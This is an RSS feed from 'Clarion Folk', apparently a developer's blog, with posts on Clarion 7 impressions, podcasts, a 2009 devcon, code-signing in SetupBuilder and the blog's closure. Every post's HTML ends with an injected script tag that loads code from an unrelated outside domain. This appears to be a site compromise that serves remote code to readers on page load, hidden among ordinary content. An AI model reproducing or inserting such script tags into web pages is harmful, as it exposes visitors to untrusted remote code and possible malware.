<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" version="2.0">

<channel>
	<title>Clarion Folk</title>
	
	<link>http://clarionfolk.com</link>
	<description>Making Development Better Than Eating Icecream</description>
	<lastBuildDate>Fri, 23 Apr 2010 04:18:35 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/rss+xml" href="http://feeds.feedburner.com/ClarionFolk" /><feedburner:info uri="clarionfolk" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><feedburner:emailServiceId>ClarionFolk</feedburner:emailServiceId><feedburner:feedburnerHostname>http://feedburner.google.com</feedburner:feedburnerHostname><feedburner:browserFriendly></feedburner:browserFriendly><item>
		<title>Finished</title>
		<link>http://clarionfolk.com/2010/04/22/finished/</link>
		<comments>http://clarionfolk.com/2010/04/22/finished/#comments</comments>
		<pubDate>Fri, 23 Apr 2010 04:16:28 +0000</pubDate>
		<dc:creator>Stu</dc:creator>
				<category><![CDATA[Featured]]></category>
		<category><![CDATA[General]]></category>

		<guid isPermaLink="false">http://clarionfolk.com/2010/04/22/finished/</guid>
		<description><![CDATA[After long months of no activity here at all but still holding some flame that perhaps I’d get back to it, I decided last night to stop Clarion Folk.
I won’t be posting here again.
Thanks to everyone for your contributions and conversation over the last couple of years.
The good news is (if that was sad for [...]]]></description>
			<content:encoded><![CDATA[<p>After long months of no activity here at all but still holding some flame that perhaps I’d get back to it, I decided last night to stop Clarion Folk.</p>
<p>I won’t be posting here again.</p>
<p>Thanks to everyone for your contributions and conversation over the last couple of years.</p>
<p>The good news is (if that was sad for you &lt;g&gt;) that I’m moving all development posts to my company blog (<a title="http://codebiscuit.com/blog/" href="http://codebiscuit.com/blog/" target="_blank">http://codebiscuit.com/blog/</a>). Since I’m still doing a lot of Clarion work, you might hopefully find something of interest on there.</p>
<p>I’ll make sure to ping my Clarion-related posts on the newsgroups.</p>
<p>It’s been a privilege to have your reading-eyes for the duration.</p>
<p>Seeya!</p>
<p><script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://clarionfolk.com/2010/04/22/finished/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Working With Clarion 7 (First Impressions)</title>
		<link>http://clarionfolk.com/2010/04/20/working-with-clarion-7-first-impressions/</link>
		<comments>http://clarionfolk.com/2010/04/20/working-with-clarion-7-first-impressions/#comments</comments>
		<pubDate>Wed, 21 Apr 2010 02:59:12 +0000</pubDate>
		<dc:creator>Stu</dc:creator>
				<category><![CDATA[clarion 7]]></category>
		<category><![CDATA[capesoft]]></category>
		<category><![CDATA[nettalk]]></category>
		<category><![CDATA[pdftools]]></category>

		<guid isPermaLink="false">http://clarionfolk.com/2010/04/20/working-with-clarion-7-first-impressions/</guid>
		<description><![CDATA[ A couple of weeks back I took the plunge and ordered my CSP upgrade. I’ve been working solidly in Clarion 7 since then. These are my (please note FIRST) impressions.
What I’ve done:

Converted a medium size project from C6.3 to Clarion 7.1
At the same time (why do i do these things?) I decided to split [...]]]></description>
			<content:encoded><![CDATA[<p><img style="border-bottom: 0px; border-left: 0px; margin: 0px 0px 0px 10px; display: inline; border-top: 0px; border-right: 0px" title="Clarion 7 IDE" border="0" alt="Clarion 7 IDE" align="right" src="http://clarionfolk.com/wp-content/uploads/2010/04/21042010125208PM.png" width="260" height="194" /> A couple of weeks back I took the plunge and ordered my CSP upgrade. I’ve been working solidly in Clarion 7 since then. These are my (please note FIRST) impressions.</p>
<p>What I’ve done:</p>
<ul>
<li>Converted a medium size project from C6.3 to Clarion 7.1</li>
<li>At the same time (why do i do these things?) I decided to split the app into Data DLL and three separate main exes. </li>
<li>The app has most of the Capesoft templates attached in some way or another, plus PDFTools (was 3, then in amongst all this i upgraded to 4), and some other 3rdParty templates.</li>
<li>The system is primarily two Nettalk Webserver apps. So it doesn’t have a lot of the 3rd-Party templates that might normally be associated with desktop development.</li>
</ul>
<p>In hindsight, I was ordering a complete roast cow instead of just a steak. Doing the conversion AND breaking apart the app AND upgrading 3rd-Party templates .. It shouldn’t have worked.</p>
<p>But after some mucking about (a couple of days), everything got sorted out.</p>
<p>The biggest trouble I had was not with the conversion but with some logic I forgot about with breaking an app into dlls+exes. </p>
<p>Thoughts:</p>
<ul>
<li>I’m not having much trouble with the IDE. There are some “scratch-your-head” design decisions, sure. But overall, I’m now comfortable and much more agile (read rapid development) than in Clarion 6. And I was quick in 6.</li>
<li>Most of the issues I have with Clarion 7 are problems that will be fixed. Like remembering how I had my embed options. Or being able to Generate, Make and Run the selected application. </li>
<li>Some of the stuff that bugged me because it was different to Clarion 6 is now process I couldn’t do without. Double-clicking on a procedure .. Gold. </li>
<li>Of course, some stuff just will always be there. Getting to the Nettalk Options can be a bit of a pain. You have to click on quite a few buttons to get there. But that’s okay. I’m okay with that, because overall, it’s still much faster to make stuff in Clarion 7.</li>
<li>It <strong>is</strong> a worry to hear about folk having heaps of problems. My machine is pretty new, but I thrash it good. I don’t have any answers for folk having the problems .. Mine works. Not very heartening for you though.</li>
</ul>
<p><strong>Tips To Begin With:</strong></p>
<ul>
<li>Turn off code completion. Seriously. It just gets in the way.</li>
<li>Turn indentation to “Automatic”.</li>
<li>“Unpick” all the panels. </li>
<ul>
<li>Except when compiling, then you probably want to pick the Output panel. There seems to be some kind of wierdness with it minimising after compilation when unpicked.</li>
</ul>
<li><img style="border-bottom: 0px; border-left: 0px; margin: 0px 0px 0px 5px; display: inline; border-top: 0px; border-right: 0px" title="Right-hand Buttons (FORGET THEM!)" border="0" alt="Right-hand Buttons (FORGET THEM!)" align="right" src="http://clarionfolk.com/wp-content/uploads/2010/04/21042010125134PM.png" width="179" height="260" />If you’ve got a decent sized screen, forget about the buttons on the right and go with the double-click to open the procedure up. Far quicker than tracking your mouse across the screen.</li>
<li>Until they get some “embed option memory” in, get used to having your embeds ALWAYS open up fully every time, unless you check “Show Filled ONLY”. This will remember the setting for that procedure, and only while the app is open. Close it down and open again, it’ll go back to default.</li>
<li><strong>MOST IMPORTANT:</strong> Be okay with what it is at the moment. I get frustrated easily, but I also can focus hard on getting a result. You have to be okay with the glitches. I know, it’s not ideal, and the SV history etc etc .. But you have to get over it if you want to work in Clarion 7.</li>
<ul>
<li>And really, you should. In my experience (limited granted), it’s already made me a lot more productive.</li>
</ul>
</ul>
<p><script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://clarionfolk.com/2010/04/20/working-with-clarion-7-first-impressions/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Not One But Two Schnitzels!</title>
		<link>http://clarionfolk.com/2009/10/15/not-one-but-two-schnitzels/</link>
		<comments>http://clarionfolk.com/2009/10/15/not-one-but-two-schnitzels/#comments</comments>
		<pubDate>Fri, 16 Oct 2009 00:49:01 +0000</pubDate>
		<dc:creator>Stu</dc:creator>
				<category><![CDATA[Devcons]]></category>
		<category><![CDATA[clarion .net]]></category>
		<category><![CDATA[clarion 7]]></category>
		<category><![CDATA[soft velocity]]></category>

		<guid isPermaLink="false">http://clarionfolk.com/2009/10/15/not-one-but-two-schnitzels/</guid>
		<description><![CDATA[We arrived in Eden around 6.30pm last night, and after unpacking went up to the restaurant which is in the same building as the conference room.
Yup, it’s been a long time since I’ve posted here.
The Clarion Aussie Devcon 2009 is currently underway. The Training days finished up yesterday (Thursday), and this morning a lot of [...]]]></description>
			<content:encoded><![CDATA[<p>We arrived in Eden around 6.30pm last night, and after unpacking went up to the restaurant which is in the same building as the conference room.</p>
<p>Yup, it’s been a long time since I’ve posted here.</p>
<p>The Clarion Aussie Devcon 2009 is currently underway. The Training days finished up yesterday (Thursday), and this morning a lot of us went on a Whale Watching trip out around the bays. Mmmmm, whale blubber.</p>
<p>This afternoon the Conference starts in proper. We’ve got a massive weekend chocka-clock full (see Schedule here). </p>
<p>I’ve already heard a lot of great things about Clarion 7 and .NET. It seems like there’s the possibility of Clarion 7.1 being released to Conference members by the end of the weekend (possibility, not certainty).</p>
<p>Last night at dinner Bob Foreman convinced me of the importance of the mindset. I’m going to fire back into Clarion 7 with fervour. </p>
<p>I hope to post some more throughout the weekend. I’ll be trying to get some “Mini” interviews done on the iPhone.</p>
<p>I’m not sure about the future of Clarion Folk, but at least for this weekend it’ll be getting some content :)</p>
<p><script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://clarionfolk.com/2009/10/15/not-one-but-two-schnitzels/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>The Podcast Is iTunes Bound</title>
		<link>http://clarionfolk.com/2009/06/12/the-podcast-is-itunes-bound/</link>
		<comments>http://clarionfolk.com/2009/06/12/the-podcast-is-itunes-bound/#comments</comments>
		<pubDate>Fri, 12 Jun 2009 11:50:31 +0000</pubDate>
		<dc:creator>Stu</dc:creator>
				<category><![CDATA[Clarion Folklore (Podcast)]]></category>
		<category><![CDATA[itunes]]></category>
		<category><![CDATA[podcast]]></category>
		<category><![CDATA[podcasting]]></category>
		<category><![CDATA[wordpress plugin]]></category>

		<guid isPermaLink="false">http://clarionfolk.com/2009/06/12/the-podcast-is-itunes-bound/</guid>
		<description><![CDATA[With the help of the excellent Podcasting WP Plugin, I’ve got a feed going and submitted it to the iTunes Store.
Should help people get access to the podcast.

]]></description>
			<content:encoded><![CDATA[<p>With the help of the excellent <a href="http://plugins.spiralwebconsulting.com/podcasting.html" target="_blank">Podcasting</a> WP Plugin, I’ve got a feed going and submitted it to the iTunes Store.</p>
<p>Should help people get access to the podcast.</p>
<p><script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://clarionfolk.com/2009/06/12/the-podcast-is-itunes-bound/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Clarion 6 Tutorial, #1</title>
		<link>http://clarionfolk.com/2009/04/01/clarion-6-tutorial-1/</link>
		<comments>http://clarionfolk.com/2009/04/01/clarion-6-tutorial-1/#comments</comments>
		<pubDate>Wed, 01 Apr 2009 15:17:37 +0000</pubDate>
		<dc:creator>Stu</dc:creator>
				<category><![CDATA[Clarion Folkview (Video)]]></category>
		<category><![CDATA[application]]></category>
		<category><![CDATA[clarion 6]]></category>
		<category><![CDATA[dictionary]]></category>
		<category><![CDATA[templates]]></category>
		<category><![CDATA[tutorial]]></category>

		<guid isPermaLink="false">http://clarionfolk.com/2009/04/01/clarion-6-tutorial-1/</guid>
		<description><![CDATA[Today I was asked about basic Clarion 6 tutorials. Couldn’t really think of any, so I did one up myself.
 
]]></description>
			<content:encoded><![CDATA[<p>Today I was asked about basic Clarion 6 tutorials. Couldn’t really think of any, so I did one up myself.</p>
<p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="510" height="425" id="viddler_db35cf1e"><param name="movie" value="http://www.viddler.com/player/db35cf1e/" /><param name="allowScriptAccess" value="always" /><param name="allowFullScreen" value="true" /><embed src="http://www.viddler.com/player/db35cf1e/" width="510" height="425" type="application/x-shockwave-flash" allowScriptAccess="always" allowFullScreen="true" name="viddler_db35cf1e"></embed></object><script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://clarionfolk.com/2009/04/01/clarion-6-tutorial-1/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Clarion Folklore Podcast #6 Is Live!</title>
		<link>http://clarionfolk.com/2009/03/26/clarion-folklore-podcast-6-is-live/</link>
		<comments>http://clarionfolk.com/2009/03/26/clarion-folklore-podcast-6-is-live/#comments</comments>
		<pubDate>Thu, 26 Mar 2009 10:36:34 +0000</pubDate>
		<dc:creator>Stu</dc:creator>
				<category><![CDATA[Clarion Folklore (Podcast)]]></category>
		<category><![CDATA[Featured]]></category>
		<category><![CDATA[clarion]]></category>
		<category><![CDATA[clarion 7]]></category>
		<category><![CDATA[deep assign]]></category>

		<guid isPermaLink="false">http://clarionfolk.com/2009/03/26/clarion-folklore-podcast-6-is-live/</guid>
		<description><![CDATA[“I think that’s considered a bug isn’t it?”
- Dave Harms
“If you learn everything, then you know everything.”
- Bruce Johnson
Download 32kbps version (14 meg)
Right-click, download the link
49 minutes long
Hosts
Ken “Deep Assign” Wragg (http://www.agedcaresoftware.com)
Dave “Clarion Sharp” Harms (http://www.clarionmag.com)
Bruce “He Didn’t Know That” Johnson (http://www.capesoft.com)
Stu “I Need More Diet Coke” Andrews (http://clarionfolk.com)
 
Some Of The Things We Talk [...]]]></description>
			<content:encoded><![CDATA[<blockquote><p>“I think that’s considered a bug isn’t it?”</p>
<p>- Dave Harms</p>
<p>“If you learn everything, then you know everything.”</p>
<p>- Bruce Johnson</p></blockquote>

<li><a href="http://www.clarionfolk.com/custom/audio/2009-03-26/ClarionFolklore-006-32kbps.mp3" target="_blank">Download 32kbps version (14 meg)</a></li>
<li>Right-click, download the link</li>
<li>49 minutes long</li>
<p><strong><span style="text-decoration: underline;">Hosts</span></strong></p>
<p>Ken “Deep Assign” Wragg (<a href="http://www.agedcaresoftware.com">http://www.agedcaresoftware.com</a>)</p>
<p>Dave “Clarion Sharp” Harms (<a href="http://www.clarionmag.com">http://www.clarionmag.com</a>)</p>
<p>Bruce “He Didn’t Know That” Johnson (<a href="http://www.capesoft.com">http://www.capesoft.com</a>)</p>
<p>Stu “I Need More Diet Coke” Andrews (<a href="http://clarionfolk.com">http://clarionfolk.com</a>)</p>
<p><strong> </strong></p>
<p><strong><span style="text-decoration: underline;">Some Of The Things We Talk About</span></strong></p>
<ul>
<li>Ken’s “Deep Assign” tip</li>
<li>Dave’s work with Clarion Sharp and Webish Templates</li>
<li>600 Pages Of Manual</li>
<li>The new Clarion 7 version</li>
<li>My girl’s coming in fighting about a toy</li>
</ul>
<p><script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://clarionfolk.com/2009/03/26/clarion-folklore-podcast-6-is-live/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
<enclosure url="http://www.clarionfolk.com/custom/audio/2009-03-26/ClarionFolklore-006.mp3" length="47162504" type="audio/mpeg" />
<enclosure url="http://www.clarionfolk.com/custom/audio/2009-03-26/ClarionFolklore-006-32kbps.mp3" length="14080484" type="audio/mpeg" />
		</item>
		<item>
		<title>A Change Of Programming Method</title>
		<link>http://clarionfolk.com/2009/02/25/a-change-of-programming-method/</link>
		<comments>http://clarionfolk.com/2009/02/25/a-change-of-programming-method/#comments</comments>
		<pubDate>Wed, 25 Feb 2009 22:49:11 +0000</pubDate>
		<dc:creator>Stu</dc:creator>
				<category><![CDATA[General]]></category>

		<guid isPermaLink="false">http://clarionfolk.com/2009/02/25/a-change-of-programming-method/</guid>
		<description><![CDATA[As my first post as NOT Evangelist, thought I’d write something really really important. Special. Wonderful.
I’ve finally moved back to using “end” as opposed to “.” in my code. Took place a couple of weeks ago, and now my brain is fully engaged with the “end”.
See, important.

]]></description>
			<content:encoded><![CDATA[<p>As my first post as NOT Evangelist, thought I’d write something really really important. Special. Wonderful.</p>
<p>I’ve finally moved back to using “end” as opposed to “.” in my code. Took place a couple of weeks ago, and now my brain is fully engaged with the “end”.</p>
<p>See, important.</p>
<p><script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://clarionfolk.com/2009/02/25/a-change-of-programming-method/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>A Year Is Done, My Time As Tech Evangelist</title>
		<link>http://clarionfolk.com/2009/02/13/a-year-is-done-my-time-as-tech-evangelist/</link>
		<comments>http://clarionfolk.com/2009/02/13/a-year-is-done-my-time-as-tech-evangelist/#comments</comments>
		<pubDate>Sat, 14 Feb 2009 00:03:56 +0000</pubDate>
		<dc:creator>Stu</dc:creator>
				<category><![CDATA[News]]></category>

		<guid isPermaLink="false">http://clarionfolk.com/2009/02/13/a-year-is-done-my-time-as-tech-evangelist/</guid>
		<description><![CDATA[I have resigned my post as Clarion Tech Evangelist.
This was not a quick decision. 
Thanks one and all for your support over the last year. It was much appreciated.
I feel that apologies are in order. I had many dreams and visions of what could be done when I started the evangelist gig. Unfortunately the only [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.youtube.com/watch?v=THoQ427nhmI" target="_blank"><img title="A Clarion Love Song" style="border-right: 0px; border-top: 0px; display: inline; margin: 0px 0px 0px 5px; border-left: 0px; border-bottom: 0px" height="176" alt="A Clarion Love Song" src="http://clarionfolk.com/wp-content/uploads/2009/02/14022009110048am1.png" width="260" align="right" border="0" /></a>I have resigned my post as Clarion Tech Evangelist.</p>
<p>This was not a quick decision. </p>
<p>Thanks one and all for your support over the last year. It was much appreciated.</p>
<p>I feel that apologies are in order. I had many dreams and visions of what could be done when I started the evangelist gig. Unfortunately the only one that really came about was the podcast. </p>
<p>Incidentally, the podcast won’t be stopping, at least I don’t see why it will. Have to talk to the other folk, but pretty sure we’ll keep batting on about how much better Australia is at sports than South Africa.</p>
<p>Mucho thanks to Bob Z, Bob F, and the rest of the gang at Soft Velocity. I’ll be watching (and participating in) the action with great interest. </p>
<p>Kudos!</p>
<p><script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://clarionfolk.com/2009/02/13/a-year-is-done-my-time-as-tech-evangelist/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Code-Signing Your Own Exes/DLLs in SetupBuilder</title>
		<link>http://clarionfolk.com/2009/01/14/code-signing-your-own-exesdlls-in-setupbuilder/</link>
		<comments>http://clarionfolk.com/2009/01/14/code-signing-your-own-exesdlls-in-setupbuilder/#comments</comments>
		<pubDate>Wed, 14 Jan 2009 13:34:56 +0000</pubDate>
		<dc:creator>Stu</dc:creator>
				<category><![CDATA[How To]]></category>
		<category><![CDATA[certificate]]></category>
		<category><![CDATA[code signing]]></category>
		<category><![CDATA[setup builder]]></category>

		<guid isPermaLink="false">http://clarionfolk.com/2009/01/14/code-signing-your-own-exesdlls-in-setupbuilder/</guid>
		<description><![CDATA[In a discussion on the Skype Clarion channel just now, Wolfgang asked me to post how to Code-Sign your own Exes/DLLs in SetupBuilder.
Saddle up.

1. I’ve got my Certificate information in the “General Information” window.
&#160;
Now I just want to sign my own files. Of which there are two. An EXE and a DLL.
2. So I go [...]]]></description>
			<content:encoded><![CDATA[<blockquote><p>In a discussion on the Skype Clarion channel just now, Wolfgang asked me to post how to Code-Sign your own Exes/DLLs in <a href="http://www.setupbuilder.com" target="_blank">SetupBuilder</a>.</p>
<p>Saddle up.</p>
</blockquote>
<p><strong>1. I’ve got my Certificate information in the “General Information” window.</strong></p>
<p><img title="codesign-001" style="border-right: 0px; border-top: 0px; display: inline; margin-left: 0px; border-left: 0px; margin-right: 0px; border-bottom: 0px" height="170" alt="codesign-001" src="http://clarionfolk.com/wp-content/uploads/2009/01/codesign001.png" width="401" border="0" />&#160;</p>
<p>Now I just want to sign my own files. Of which there are two. An EXE and a DLL.</p>
<p><strong>2. So I go to the Script Editor.</strong></p>
<p><img title="Code Sign #2" style="border-right: 0px; border-top: 0px; display: inline; margin-left: 0px; border-left: 0px; margin-right: 0px; border-bottom: 0px" height="290" alt="Code Sign #2" src="http://clarionfolk.com/wp-content/uploads/2009/01/codesign002.png" width="275" border="0" />&#160;</p>
<p><strong>3. Just above the “Features” line, get a couple of blank lines going on.</strong></p>
<p><img title="codesign-003" style="border-right: 0px; border-top: 0px; display: inline; border-left: 0px; border-bottom: 0px" height="115" alt="codesign-003" src="http://clarionfolk.com/wp-content/uploads/2009/01/codesign003.png" width="304" border="0" /> </p>
<p>I haven’t experimented past “just get it working”, so there are probably a bunch of different places you could do this.</p>
<p><strong>4. Make sure the line is selected.</strong></p>
<p><img title="codesign-004" style="border-right: 0px; border-top: 0px; display: inline; border-left: 0px; border-bottom: 0px" height="101" alt="codesign-004" src="http://clarionfolk.com/wp-content/uploads/2009/01/codesign004.png" width="326" border="0" /> </p>
<p><strong>5. Double-click on the “#embed Vista manifest…” Compiler Directive Script Function in the top right-hand corner of SB.</strong></p>
<p><img title="codesign-005" style="border-right: 0px; border-top: 0px; display: inline; border-left: 0px; border-bottom: 0px" height="254" alt="codesign-005" src="http://clarionfolk.com/wp-content/uploads/2009/01/codesign005.png" width="247" border="0" /> </p>
<p><strong>6. As follows after the image:</strong></p>
<p><img title="codesign-006" style="border-right: 0px; border-top: 0px; display: inline; border-left: 0px; border-bottom: 0px" height="360" alt="codesign-006" src="http://clarionfolk.com/wp-content/uploads/2009/01/codesign006.png" width="494" border="0" />&#160;</p>
<p>(a) Add your filename.</p>
<p>(b) Fill out the Name and Description.</p>
<p>(c) Check these two.</p>
<p><strong>7. Double-click on the “#code-sign application” Compiler Directive Script Function in the top right-hand corner of SB.</strong></p>
<p><img title="codesign-007" style="border-right: 0px; border-top: 0px; display: inline; border-left: 0px; border-bottom: 0px" height="273" alt="codesign-007" src="http://clarionfolk.com/wp-content/uploads/2009/01/codesign007.png" width="360" border="0" /> </p>
<p><strong>8. As follows after the image:</strong></p>
</p>
<p>&#160;<img title="codesign-008" style="border-right: 0px; border-top: 0px; display: inline; border-left: 0px; border-bottom: 0px" height="521" alt="codesign-008" src="http://clarionfolk.com/wp-content/uploads/2009/01/codesign008.png" width="490" border="0" /> </p>
</p>
</p>
<p>(a) Add your filename.</p>
<p>(b) Put in a Description</p>
<p>(c) These should be defaulted, if you’ve got the same as me in 1.</p>
<p>(d) Definitely stick this in :)</p>
<p>(e) Check these two.</p>
<p><strong>9. Compile</strong></p>
<p>And there you have it. That’s all I did to get this working. </p>
<p>When you compile, the little “password” appear. SB will fill in the password if you’ve entered it. See (d) directly above.</p>
<p>Hope this has been helpful for Folk.</p>
<p><script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://clarionfolk.com/2009/01/14/code-signing-your-own-exesdlls-in-setupbuilder/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>This Season Of Joy</title>
		<link>http://clarionfolk.com/2008/12/23/this-season-of-joy/</link>
		<comments>http://clarionfolk.com/2008/12/23/this-season-of-joy/#comments</comments>
		<pubDate>Wed, 24 Dec 2008 03:50:42 +0000</pubDate>
		<dc:creator>Stu</dc:creator>
				<category><![CDATA[General]]></category>

		<guid isPermaLink="false">http://clarionfolk.com/2008/12/23/this-season-of-joy/</guid>
		<description><![CDATA[As most of us wind down and take at least a few days off let me say this:
&#160;
God Rest Ye Merry!

]]></description>
			<content:encoded><![CDATA[<p>As most of us wind down and take at least a few days off let me say this:</p>
<p>&#160;</p>
<p><strong><font face="Cambria" color="#008000" size="6"><u>God Rest Ye Merry!</u></font></strong></p>
<p><script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://clarionfolk.com/2008/12/23/this-season-of-joy/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
